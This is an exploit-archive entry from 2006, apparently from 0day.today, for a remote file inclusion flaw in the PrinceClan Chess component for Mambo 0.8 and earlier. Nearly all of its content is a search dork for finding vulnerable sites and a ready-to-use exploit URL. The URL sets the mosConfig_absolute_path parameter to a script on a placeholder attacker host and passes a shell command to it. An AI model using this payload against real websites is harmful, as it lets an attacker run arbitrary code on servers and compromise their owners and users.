id: 607
date: 07/23/2006
title: PrinceClan Chess Mambo Com <= 0.8 Remote Inclusion Vulnerability
author: OLiBekaS
cves: 

================================================================
PrinceClan Chess Mambo Com <= 0.8 Remote Inclusion Vulnerability
================================================================




# pc_chess Component

- dork : index.php?option=com_pcchess

- exploit :

http://[target]/[path]/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://[attacker]/cmd.txt?&cmd=ls 



#  0day.today [2023-03-22]  #